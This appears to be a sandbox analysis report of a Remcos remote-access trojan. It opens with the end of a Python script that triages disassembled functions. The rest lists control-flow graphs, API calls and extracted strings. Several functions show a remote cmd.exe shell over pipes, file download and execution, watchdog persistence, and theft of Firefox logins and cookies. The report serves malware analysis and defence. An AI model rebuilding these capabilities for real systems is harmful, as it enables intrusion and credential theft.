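        if (c.name == "LoadLibraryExW" and len(c.args) > 2 and parse_arg(c.args[2]) == LOAD_LIBRARY_SEARCH_SYSTEM32
                and any(x.name == "GetLastError" for x in later)
                and any(x.name == "LoadLibraryExW" and len(x.args) > 2 and parse_arg(x.args[2]) == 0 for x in later)):
            # CRT module lookup: try LOAD_LIBRARY_SEARCH_SYSTEM32, retry with flags=0 if the OS rejects it.
            tags.append("CRT try_get_module fallback (LoadLibraryExW 0x800 -> 0), runtime boilerplate")
    if calls and all(c.module in ("LIBCMT", "LIBVCRUNTIME") for c in calls):
        tags.append("CRT-internal (only LIBCMT/LIBVCRUNTIME callees)")
    return tags

def triage_all(funcs: List[Function]) -> dict:
    """Entry address -> tags, keeping only functions with something worth noting."""
    return {f.entry: t for f in funcs if (t := triage(f))}

if __name__ == "__main__":
    for addr, tags in triage_all(parse_blocks(SAMPLE)).items():
        print(f"{addr:08x}: {'; '.join(tags)}")
```

Run it against the text of a whole report section instead of SAMPLE and the CRT-internal tag removes most of the noise, leaving the mutex check above, the keyboard-hook and browser-credential functions flagged in the signature summary, and anything else that calls outside the runtime. The rules look only at the function's own calls; "Part of subcall function" lines are kept so that callee behaviour can be inspected, but they are deliberately not counted, because the same CRT callees appear under almost every function.
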
                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 170 44785d-44787f call 447174 172 447884-44788b 170->172 173 4478b4-4478ce call 4478e5 LCMapStringW 172->173 174 44788d-4478b2 172->174 178 4478d4-4478e2 call 433d2c 173->178 174->178
                                                                                                              APIs
                                                                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 004478CE
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: String
                                                                                                              • String ID: LCMapStringEx
                                                                                                              • API String ID: 2568140703-3893581201
                                                                                                              • Opcode ID: bfa8507c05aaf59a1b65123d696e4265d6ae70caa07f5ecb030579337eb990e7
                                                                                                              • Instruction ID: 749e071dddadb0611b3357a2cf1c840dd35b3db394ad94bf3c266594d1e105ea
                                                                                                              • Opcode Fuzzy Hash: bfa8507c05aaf59a1b65123d696e4265d6ae70caa07f5ecb030579337eb990e7
                                                                                                              • Instruction Fuzzy Hash: D4012932504209FBDF12AF90DC06EEE7F62EF09755F008165FE0865161C7369971EB99

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 182 4473ba-4473dc call 447174 184 4473e1-4473e8 182->184 185 4473f9 TlsAlloc 184->185 186 4473ea-4473f7 184->186 187 4473ff-44740d call 433d2c 185->187 186->187
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Alloc
                                                                                                              • String ID: FlsAlloc
                                                                                                              • API String ID: 2773662609-671089009
                                                                                                              • Opcode ID: eb9744b0f99d01425a23a469579f78c82d33e3ecb83b5d68344d66ff2f79c789
                                                                                                              • Instruction ID: 24f66c7253cb77c9f437760898e342ee7dcb6335a46030aa2dd544025cc123c2
                                                                                                              • Opcode Fuzzy Hash: eb9744b0f99d01425a23a469579f78c82d33e3ecb83b5d68344d66ff2f79c789
                                                                                                              • Instruction Fuzzy Hash: B8E05530A8420AA7D214AF20AC03A2EFB54CF04762F0005AAFC0493342CE388E01D1DE

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 192 438e57-438e6c call 438de8 194 438e71-438e78 192->194 195 438e8a-438e8c TlsAlloc 194->195 196 438e7a-438e89 194->196
                                                                                                              APIs
                                                                                                              • try_get_function.LIBVCRUNTIME ref: 00438E6C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: try_get_function
                                                                                                              • String ID: FlsAlloc
                                                                                                              • API String ID: 2742660187-671089009
                                                                                                              • Opcode ID: b1cba7f0218e917ff68914ef6add9c5828cf048b7d115dedf5b4937681f64105
                                                                                                              • Instruction ID: a0307b958b0d3629ed7144d0bc7264abd5bab77eff0b6699954acb4a337da6a1
                                                                                                              • Opcode Fuzzy Hash: b1cba7f0218e917ff68914ef6add9c5828cf048b7d115dedf5b4937681f64105
                                                                                                              • Instruction Fuzzy Hash: 5ED0C231684338A3C1002684AC02B9ABF049B00FB3F0505B7FD08A12938D6A5810A6CE

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 199 44de89-44dead call 44da5c 202 44debd-44dec4 199->202 203 44deaf-44deb8 call 44dacf 199->203 205 44dec7-44decd 202->205 210 44e06a-44e079 call 433d2c 203->210 207 44ded3-44dedf 205->207 208 44dfbd-44dfdc call 436050 205->208 207->205 211 44dee1-44dee7 207->211 217 44dfdf-44dfe4 208->217 214 44dfb5-44dfb8 211->214 215 44deed-44def3 211->215 216 44e069 214->216 215->214 219 44def9-44df05 IsValidCodePage 215->219 216->210 220 44dfe6-44dfeb 217->220 221 44e01b-44e025 217->221 219->214 222 44df0b-44df18 GetCPInfo 219->222 223 44dfed-44dff3 220->223 224 44e018 220->224 221->217 227 44e027-44e04e call 44da1e 221->227 225 44dfa2-44dfa8 222->225 226 44df1e-44df3f call 436050 222->226 228 44e00c-44e00e 223->228 224->221 225->214 229 44dfaa-44dfb0 call 44dacf 225->229 240 44df41-44df48 226->240 241 44df92 226->241 237 44e04f-44e05e 227->237 232 44dff5-44dffb 228->232 233 44e010-44e016 228->233 242 44e066-44e067 229->242 232->233 238 44dffd-44e008 232->238 233->220 233->224 237->237 245 44e060-44e061 call 44db34 237->245 238->228 243 44df4a-44df4f 240->243 244 44df6b-44df6e 240->244 246 44df95-44df9d 241->246 242->216 243->244 247 44df51-44df57 243->247 249 44df73-44df7a 244->249 245->242 246->245 250 44df5f-44df61 247->250 249->249 251 44df7c-44df90 call 44da1e 249->251 252 44df63-44df69 250->252 253 44df59-44df5e 250->253 251->246 252->243 252->244 253->250
                                                                                                              APIs
                                                                                                                • Part of subcall function 0044DA5C: GetOEMCP.KERNEL32(00000000,?,?,0044DCE5,?), ref: 0044DA87
                                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044DD2A,?,00000000), ref: 0044DEFD
                                                                                                              • GetCPInfo.KERNEL32(00000000,0044DD2A,?,?,?,0044DD2A,?,00000000), ref: 0044DF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CodeInfoPageValid
                                                                                                              • String ID:
                                                                                                              • API String ID: 546120528-0
                                                                                                              • Opcode ID: 53f6a56cd97a0974a2183497a5087aed56a9e6d0f65aaaec85088475c598411f
                                                                                                              • Instruction ID: df262af5b8aedb6acfa17e1c9bcd504f5ccc85cb1eacd95bde0bd7f7b44a6e87
                                                                                                              • Opcode Fuzzy Hash: 53f6a56cd97a0974a2183497a5087aed56a9e6d0f65aaaec85088475c598411f
                                                                                                              • Instruction Fuzzy Hash: C2513370D042059EFB348F72C8856BBBBA5AF41304F14446FD0978B252D67DA94ACB99

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 256 44dcc8-44dcf2 call 446ebf call 44dde7 call 44da5c 263 44dcf4-44dcf6 256->263 264 44dcf8-44dd0d call 446aff 256->264 265 44dd4b-44dd4e 263->265 268 44dd3d 264->268 269 44dd0f-44dd25 call 44de89 264->269 271 44dd3f-44dd4a call 446ac5 268->271 272 44dd2a-44dd30 269->272 271->265 274 44dd32-44dd37 call 445354 272->274 275 44dd4f-44dd53 272->275 274->268 277 44dd55 call 4438b6 275->277 278 44dd5a-44dd65 275->278 277->278 281 44dd67-44dd71 278->281 282 44dd7c-44dd96 278->282 281->282 284 44dd73-44dd7b call 446ac5 281->284 282->271 285 44dd98-44dd9f 282->285 284->282 285->271 287 44dda1-44ddb8 call 44d932 285->287 287->271 291 44ddba-44ddc4 287->291 291->271
                                                                                                              APIs
                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                • Part of subcall function 0044DDE7: _abort.LIBCMT ref: 0044DE19
                                                                                                                • Part of subcall function 0044DDE7: _free.LIBCMT ref: 0044DE4D
                                                                                                                • Part of subcall function 0044DA5C: GetOEMCP.KERNEL32(00000000,?,?,0044DCE5,?), ref: 0044DA87
                                                                                                              • _free.LIBCMT ref: 0044DD40
                                                                                                              • _free.LIBCMT ref: 0044DD76
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorLast_abort
                                                                                                              • String ID:
                                                                                                              • API String ID: 2991157371-0
                                                                                                              • Opcode ID: 1c1e601d523f09ffc5791c958070a32dbad2633fea9a1d512da203678c683477
                                                                                                              • Instruction ID: 78e98af2e08dba5698695eadbe882f177ccac690bbf417dcf661007a8bbce0b0
                                                                                                              • Opcode Fuzzy Hash: 1c1e601d523f09ffc5791c958070a32dbad2633fea9a1d512da203678c683477
                                                                                                              • Instruction Fuzzy Hash: CE31E4B1D04108AFFB14EF69D441B9A77F4DF41324F25409FE9049B2A2EB799D41CB58

                                                                                                              APIs
                                                                                                              • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91,00000000), ref: 004471D4
                                                                                                              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004471E1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                              • String ID:
                                                                                                              • API String ID: 2279764990-0
                                                                                                              • Opcode ID: d60c3e2bfe9cc093b3110c1e14b53e816b2a5bac2969881e56f7ec686a65f544
                                                                                                              • Instruction ID: 6f7a2b722a2a1d8c8194c8cb68bd8fc2eac5a8381c6f9e3e6965fab01942ac9c
                                                                                                              • Opcode Fuzzy Hash: d60c3e2bfe9cc093b3110c1e14b53e816b2a5bac2969881e56f7ec686a65f544
                                                                                                              • Instruction Fuzzy Hash: 8A110233A041629BFB329F68EC4099B7395AB803747164672FD19AB344DB34EC4386E9

                                                                                                              APIs
                                                                                                                • Part of subcall function 00438E57: try_get_function.LIBVCRUNTIME ref: 00438E6C
                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437EED
                                                                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00437EF8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                              • String ID:
                                                                                                              • API String ID: 806969131-0
                                                                                                              • Opcode ID: b143fc5c6894dc50f93e5526221a244408d4657bcec4ada42a0f1b5aca1b3c68
                                                                                                              • Instruction ID: ae9b6128b1ea9ffe86f5afd704093ee73625e806026b45b402e8089d921c29d6
                                                                                                              • Opcode Fuzzy Hash: b143fc5c6894dc50f93e5526221a244408d4657bcec4ada42a0f1b5aca1b3c68
                                                                                                              • Instruction Fuzzy Hash: E1D0A7F101C3805C9D2062752C036561344A809B78FB036CFF174D5DC1EE2D8840A41E
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F74,00000001,00000364,?,0043A846,00000000,00000000,00000000,00000000,00000000,00000000,00402C08), ref: 00448747
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              • Opcode ID: de2f67f7923a31b36d9b5f834b48d2b0e0f5da7a677d300afd471130a21967f0
                                                                                                              • Instruction ID: 09342868e9f2d6cc7f7b696f5049c05c0568eaa44df27644d65b9450949fa691
                                                                                                              • Opcode Fuzzy Hash: de2f67f7923a31b36d9b5f834b48d2b0e0f5da7a677d300afd471130a21967f0
                                                                                                              • Instruction Fuzzy Hash: 9CF0E93250412467BB216A369D55B5F7748AF427B0B34802BFC08EA691DF68DD4182ED
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              • Opcode ID: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                                                                              • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                                                                              • Opcode Fuzzy Hash: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                                                                              • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
                                                                                                              APIs
                                                                                                              • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                                                • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B489
                                                                                                                • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4BB
                                                                                                                • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B50C
                                                                                                                • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B561
                                                                                                                • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B568
                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00406C38
                                                                                                                • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00406C80
                                                                                                                • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000), ref: 00406CC0
                                                                                                                • Part of subcall function 00406BE9: MoveFileW.KERNEL32 ref: 00406CDD
                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                                                                                • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                                              • GetLogicalDriveStringsA.KERNEL32 ref: 004074F5
                                                                                                              • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                                              • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                                                • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                              • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                                              • StrToIntA.SHLWAPI(00000000), ref: 004079BA
                                                                                                                • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                                              • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                                              • API String ID: 2918587301-599666313
                                                                                                              • Opcode ID: fe774ec57ea4c9c98434e9a8a4b205946b127d152570ca2712e415059fb31443
                                                                                                              • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                                                                              • Opcode Fuzzy Hash: fe774ec57ea4c9c98434e9a8a4b205946b127d152570ca2712e415059fb31443
                                                                                                              • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                                                                              APIs
                                                                                                              • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                                                • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                                                                                • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                              • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                                              • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                                                                              • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                                                                                • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                                                                                • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                                                                              • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                                                              • PeekNamedPipe.KERNEL32 ref: 00405264
                                                                                                              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                                                • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98), ref: 0040538E
                                                                                                              • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                                              • CloseHandle.KERNEL32 ref: 004053CD
                                                                                                              • CloseHandle.KERNEL32 ref: 004053D5
                                                                                                              • CloseHandle.KERNEL32 ref: 004053E7
                                                                                                              • CloseHandle.KERNEL32 ref: 004053EF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                              • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                                                                              • API String ID: 3815868655-81343324
                                                                                                              • Opcode ID: 347f2c88b3c2668be74fabae2308f42da89957fbc9a464020775b19edc51cc58
                                                                                                              • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                                                                              • Opcode Fuzzy Hash: 347f2c88b3c2668be74fabae2308f42da89957fbc9a464020775b19edc51cc58
                                                                                                              • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                                                                              APIs
                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004), ref: 004127FE
                                                                                                                • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?), ref: 00412809
                                                                                                              • OpenMutexA.KERNEL32 ref: 00410F81
                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                                                • Part of subcall function 004124B7: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                                                                                • Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32 ref: 004124F5
                                                                                                                • Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                                              • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                                              • API String ID: 65172268-860466531
                                                                                                              • Opcode ID: c59a9ba99b2cc187f19442751e4719393b3c5f539a1bb9958299626df8d8cbdd
                                                                                                              • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                                                                              • Opcode Fuzzy Hash: c59a9ba99b2cc187f19442751e4719393b3c5f539a1bb9958299626df8d8cbdd
                                                                                                              • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                                                                              APIs
                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Find$CloseFile$FirstNext
                                                                                                              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                              • API String ID: 1164774033-3681987949
                                                                                                              • Opcode ID: 012abd7bd482f24294ec220c5f3416e7c12077f4aefc2c6d47742caa5bc96ad8
                                                                                                              • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                                                                              • Opcode Fuzzy Hash: 012abd7bd482f24294ec220c5f3416e7c12077f4aefc2c6d47742caa5bc96ad8
                                                                                                              • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                                              APIs
                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Find$Close$File$FirstNext
                                                                                                              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                              • API String ID: 3527384056-432212279
                                                                                                              • Opcode ID: eec28e5122cf95747afd0231d26089d1190572cbd646818cfb2ab67d48c7021b
                                                                                                              • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                                                                              • Opcode Fuzzy Hash: eec28e5122cf95747afd0231d26089d1190572cbd646818cfb2ab67d48c7021b
                                                                                                              • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                                                                              APIs
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E25E
                                                                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E30C
                                                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004), ref: 004127FE
                                                                                                                • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?), ref: 00412809
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E371
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
